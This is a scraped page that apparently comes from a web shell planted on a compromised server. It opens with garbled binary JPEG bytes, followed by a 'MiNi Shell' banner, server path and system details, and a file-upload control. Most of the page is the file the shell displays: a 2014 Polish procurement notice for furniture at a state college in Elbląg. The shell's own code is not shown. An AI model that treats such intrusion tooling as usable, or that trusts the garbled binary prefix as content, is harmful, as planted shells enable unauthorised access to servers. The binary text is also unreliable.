JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140711/233594-N-2014.html

<p class="kh_header"><b>Elbląg: Dostawa i montaż mebli w zabudowie stałej ciągów komunikacyjnych w budynku dydaktycznym Państwowej Wyższej Szkoły Zawodowej w Elblągu przy ul. Grunwaldzkiej 137</b><br>
<b>Numer ogłoszenia: 233594 - 2014; data zamieszczenia: 11.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa w Elblągu , ul.  Wojska Polskiego 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 629 0 505, faks 55 629 0 510.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz.elblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż mebli w zabudowie stałej ciągów komunikacyjnych w budynku dydaktycznym Państwowej Wyższej Szkoły Zawodowej w Elblągu przy ul. Grunwaldzkiej 137.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa i montaż mebli w zabudowie stałej ciągów komunikacyjnych w budynku dydaktycznym Państwowej Wyższej Szkoły Zawodowej w Elblągu przy ul. Grunwaldzkiej 137 
1)Zakres zamówienia obejmuję dostawę i montaż mebli w zabudowie stałej ciągów komunikacyjnych w budynku dydaktycznym Państwowej Wyższej Szkoły Zawodowej w Elblągu przy ul. Grunwaldzkiej 137w tym:
a)Siedziska wiszące, rozkładane, mocowane do pionowego  panela zamocowanego do ściany, montaż na kotwy chemiczne  - 108 szt.,
b)Ławka wolnostojąca z możliwością mocowania do podłoża - 20 szt.
c)Ława wolnostojąca do stołu przyściennego - 24 szt.
d)Stół przyścienny w kształcie litery S w formie panelu przyściennego, montaż na kotwy chemiczne  - 12 szt.
2)Szczegółowy opis przedmiotu zamówienia określa dokumentacja stanowiąca ZAŁĄCZNIK NR 1 do SIWZ w tym: 
a)Charakterystyka produktu Nr 1 - 4 ZAŁĄCZNIK NR 1a,  
b)Rysunki techniczne i wizualizacje ZAŁĄCZNIK NR 1b,
Powyższa dokumentacja opracowana została przez firmę LOCUM  M. Paszyn Sp. Komandytowa, ul Lipowa 33, 62-800 Kalisz. Informacje dotyczące przedmiotu zamówienia zawarte w dokumencie wymienionym w pkt 2) uważa się za obowiązujące. Ryzyko prawidłowości ustalenia kosztów wykonania przedmiotu zamówienia ponosi Wykonawca. 
3)Wykonawca zobowiązuje się do dostarczenia przedmiotu zamówienia własnym transportem, na własny koszt i na własne ryzyko oraz dokona rozładunku i montażu własnymi zasobami ludzkimi i sprzętowymi w terminie w miejscu i terminie wskazanym przez Zamawiającego.
4)Zamawiający zastrzega, że Wykonawca bierze pełną odpowiedzialność za technologię i sposób montowania mebli do ścian i podłoża budynku. Uwzględniając istniejące warunki montażu tj. rodzaj ścian, podłoża. Jak również uwzględniające łatwość demontażu do celów serwisowania elementów ruchomych siedziska, oraz na czas bieżących remontów ścian w pomieszczeniach.
5)Zamawiający oczekuje wysokiego standardu wykończenia, z wykorzystaniem najlepszych materiałów dostępnych na rynku, posiadających wymagane prawem atesty, jak również spełniające obowiązujące przepisy i normy, ze szczególnym uwzględnieniem spełnienia przepisów przeciwpożarowych. Ww. dokumenty należy dostarczyć na żądanie Zamawiającego.
6)Oferowane produkty mają odpowiadać normom/certyfikatom wynikającym z ZAŁĄCZNIKA nr 1 do SIWZ. Za równoważne ww. normom/certyfikatom, Zamawiający uzna normy utworzone przez niezależny ośrodek normalizacyjny o zasięgu europejskim obdarzony zaufaniem publicznym, które u podstaw oparte są na przejrzystości, dobrowolności, bezstronności, efektywności, wiarygodności, spójności i uzgadnianiu na poziomie krajowym i europejskim. Zastosowanie musi odpowiadać swoim rodzajem i zakresem, celom założonym w przywoływanych powyżej normach.
7)Produkty dostarczone w ramach realizacji przedmiotu zamówienia będą:
a)nowe nieużywane wcześniej w innych projektach tzn. nieużywane przed dniem dostarczenia z wyłączeniem używania niezbędnego do przeprowadzenia testu ich poprawnej pracy,
b)posiadały świadczenia gwarancyjne oparte na gwarancji świadczonej przez producenta lub dostawcę,
c)zakupione w oficjalnym kanale sprzedaży producenta na rynek polski, co zgodnie z tiret a i b oznacza, że będą one urządzeniami posiadającym stosowny pakiet usług gwarancyjnych kierowanych do użytkowników z obszaru Rzeczpospolitej Polskiej,
8)Warunki ogólne dotyczące gwarancji i serwisowania:
a)Wykonawca udzieli Zamawiającemu gwarancji jakości na dostawę i montaż mebli przez okres minimum 36 miesięcy od daty końcowego odbioru zamówienia. Okres rękojmi ustala się na 3 miesiące ponad okres gwarancji. W wymienionych terminach Wykonawca zobowiązany jest do bezpłatnego usuwania przedmiotu zamówienia ujawnionych wad.
b)Wykonawca w czasie trwania gwarancji rękojmi zobowiązuje się do wykonywania bezpłatnych przeglądów serwisowych minimum raz w roku w czasie trwania gwarancji.
c)W przypadku wystąpienia usterki w przedmiocie zamówienia w okresie gwarancyjnym z przyczyn nie wynikłych z niewłaściwej eksploatacji lub zdarzeń losowych, Wykonawca zobowiązuje się do bezpłatnego usunięcia usterki w terminie 7 dni roboczych licząc od daty zgłoszenia telefonicznego lub pisemnego.
d)Do usunięcia usterki serwis przystąpi nie później, niż w trzecim dniu roboczym od zgłoszenia. 
e)W okresie gwarancyjnym koszty transportu sprzętu do i z punktu naprawczego Wykonawca pokryje we własnym zakresie. 
f)Wykonawca zobowiązuje się przenieś na Zamawiającego wszelkie uprawnienia z tytułu gwarancji udzielonych przez dostawców produktów, wydając w tym celu Zamawiającemu właściwe dokumenty gwarancyjne, najpóźniej w chwili podpisania protokołu końcowego odbioru robót.
9)Wykonawca przed wykonaniem i dostarczeniem mebli skontaktuję się z Zamawiającym celem potwierdzenia ich wielkości i koloru płyty meblowej, tapicerki itp.
10)Wykonawca, z którym zostanie zawarta umowa będzie winien zabezpieczyć w sposób zapobiegający jakimkolwiek zniszczeniom, degradacji bądź dewastacji wszelkie mienie ruchome i nieruchome będące własnością Zamawiającego pozostawione na czas dostawy i montażu. Po zakończeniu prac Wykonawca przekaże ww. mienie Zamawiającemu w stanie niepogorszonym. W ramach obowiązku zabezpieczenia mienia wykonawca jest zobowiązany do przeniesienia mienia w miejsce wskazane przez Zamawiającego, a po zakończeniu prac w miejsce docelowego przeznaczenia.
11)Wykonawca winien zorganizować i realizować dostawę i montaż w sposób zapewniający ciągłość pracy Zamawiającego.
12)Zgodnie z treścią art. 29 ust. 3 Prawo zamówień publicznych (tekst jednolity Dz.U.2013..907 z późn. zm.), jeżeli opis przedmiotu zamówienia zawiera przywołania znaków towarowych, patentów lub pochodzenia wyrobów należy uznać, iż wskazaniu temu towarzyszą wyrazy lub równoważny. Wszystkie nazwy firmowe urządzeń i wyrobów użyte w Opisie przedmiotu zamówienia powinny być traktowane, jako definicje standardowe, a nie konkretne nazwy firmowe urządzeń i wyrobów zastosowanych w dokumentacji SIWZ.
13)Zamawiający dopuszcza składanie ofert równoważnych, obejmujących wyroby o parametrach i funkcjach technicznych nie gorszych niż wymienione w opisie przedmiotu zmówienia stanowiącym ZAŁĄCZNIK nr 1 do, SIWZ, których zastosowanie prowadzić będzie do zakładanego efektu. Zgodnie z art. 30 ust 5 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych, Wykonawca powołujący się na rozwiązania równoważne jest zobowiązany wykazać, że oferowane dostawy spełniają wymagania określone przez Zamawiającego. Parametry równoważności zostały określone w ZAŁĄCZNIKU nr 1 do SIWZ
14)Zaleca się, aby Wykonawca przeprowadził wizję lokalną budynku Państwowej Wyższej Szkoły Zawodowej w Elblągu przy ul. Grunwaldzkiej 137, po wcześniejszym uzgodnieniu terminu z Zamawiającym.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.00.00-6, 45.42.11.53-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda wniesienia wadium. Kwota wadium wymagana do wzięcia udziału w postępowaniu wynosi 16.000,00 PLN (słownie: szesnaście tysięcy złotych 00/100);
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b, ust. 5, pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 z późn. zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, gdy Wykonawca posiada doświadczenie polegające na wykonaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia. tj. co najmniej 2 dostawy każda polegająca na dostawie mebli o wartości minimum 300 000,00 PLN brutto (słownie: trzysta tysięcy złotych 00/100) w tym jedna polegająca na dostawie i montażu mebli w zabudowie stałej: siedzisk, ławek, stołów itp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)	Dostarczenie wraz z ofertą 1 szt. prototypu w skali 1:1 siedziska wiszącego rozkładanego mocowanego do pionowego panela (rama montażowa) wykonanego wg opisu technicznego zawartego Charakterystyce produktu Nr 1 ZAŁĄCZNIK NR 1a oraz zgodnie z Rysunkiem technicznym i wizualizacją ZAŁĄCZNIK NR 1b dla Charakterystyki produktu Nr 1 w celu sprawdzenia spełnienia przez oferowane produkty wymagań określonych w SIWZ.
b)	Dostarczenie wraz z ofertą  próbkę płyty  pokrytej białym laminatem HPL bezrdzeniowym, brzegi łączenia płyty HPL wypełnione białym akrylem, w formacie 30cm x 30cm grubości 10cm połączonej prostopadle z drugą płytą o tym samym formacie,  zgodnie z opisem technologii wykonania ławy naściennej zgodnie z opisem technicznym stołu  przyściennego w kształcie litery S w formie panelu przyściennego zawartym w Charakterystyce produktu Nr 4 ZAŁĄCZNIK NR 1a oraz zgodnie z Rysunkiem technicznym i wizualizacją ZAŁĄCZNIK NR 1b  dla Charakterystyki produktu Nr 4 w celu sprawdzenia spełnienia przez oferowane produkty wymagań określonych w SIWZ.
c)	Zamawiający wymaga podania parametrów technicznych, modelu, producenta i ilości, w celu sprawdzenia spełnienia przez oferowane dostawy wymagań określonych w SIWZ i opisie przedmiotu zamówienia stanowiącego ZAŁĄCZNIK NR 1 SIWZ w tym celu Wykonawca wypełni Specyfikację Techniczną Dostawy sporządzoną zgodnie z wymaganiami wzoru stanowiącego ZAŁĄCZNIK NR 8 do SIWZ Wykonawca może dołączyć do oferty materiały pozwalające ocenić proponowane parametry techniczne sprzętu (opisy, fotografie, katalogi, itp.)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz oferty wypełniony według załączonego wzoru- ZAŁĄCZNIK NR 2 do SIWZ 
i podpisany przez osobę uprawnioną do reprezentowania Wykonawcy i składania oświadczeń woli
2)	Specyfikacja Techniczna Dostawy - ZAŁĄCZNIK NR 6 do SIWZ podpisana przez osobę uprawnioną do reprezentowania Wykonawcy i składania oświadczeń woli 
3)	Pełnomocnictwo lub notarialnie poświadczony odpis tego pełnomocnictwa - jeżeli oferta jest podpisana w imieniu Wykonawcy przez osobę (osoby) posiadającą stosowne pełnomocnictwo,
4)	Pełnomocnictwo lub notarialnie poświadczony odpis pełnomocnictwa do reprezentowania 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji zamówienia - 5</li>
<li>3 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian  zawartej umowy:
a)	konieczność przedłużenia terminu umownego w przypadku:
-	gdy Wykonawca uzyska pisemne potwierdzenie producenta oferowanych produktów o braku możliwości realizacji zamówienia w terminie określonym w umowie,
-	z przyczyn zależnych od Zamawiającego. (np. względy techniczne, organizacyjne, ekonomiczne) lub gdy zmiany te są korzystne dla Zamawiającego;
b)	zmniejszenie zakresu rzeczowego umowy w przypadku, gdy Wykonawca uzyska pisemne potwierdzenie producenta oferowanych produktów o braku możliwości realizacji zamówienia w zakresie określonym w umowie np. z powodu wycofania ze sprzedaży,
c)	zmiany dotyczącej dostarczanego przedmiotu zamówienia na produkt o parametrach nie gorszych niż oferowany za cenę taką jak ustalona w umowie, w sytuacji, gdy nastąpi jego wycofanie z produkcji (po terminie otwarcia ofert), co będzie potwierdzone oświadczeniem producenta, po uzyskaniu pisemnej zgody Zamawiającego,
d)	ograniczenie zakresu dostaw wynikające z braku środków finansowych Zamawiającego,
e)	zmian podwykonawców 
f)	konieczność wykonania dodatkowych badań, ekspertyz, analiz itp.
g)	likwidacja lub rozwiązanie firmy Wykonawcy
h)	zmiana nr konta Wykonawcy lub innych danych podmiotowych
i)	rozbieżności lub niespójności w treści Umowy (wraz z załącznikami oraz dokumentami stanowiącymi jej integralną część) w zakresie niezbędnym do usunięcia tych rozbieżności lub niespójności. 
j)	zmiany obowiązujących przepisów prawa.
k)	ustawowa zmiana stawki podatku VAT w sytuacji łącznego spełnienia dwóch przesłanek:
- 	gdy istnieje obiektywna konieczność wprowadzenia zmian, np., gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą w rozumieniu art. 357 ze znaczkiem 1 Kodeksu Cywilnego, 
- 	gdy zmiana wynika z okoliczności, których nie można było przewidzieć w momencie zawarcia umowy
l)	działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności oraz okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych, który przy składaniu ofert musi być normalnie brany pod uwagę (wyjątek stanowią przeszkody atmosferyczne o charakterze katastrof). 
2)	Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej zmiany w formie aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwsz.elblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa w Elblągu, ul. Wojska Polskiego 1, pok. 215.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2014 godzina 11:00, miejsce: Państwowa Wyższa Szkoła Zawodowa w Elblągu, ul. Wojska Polskiego 1, pok. 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com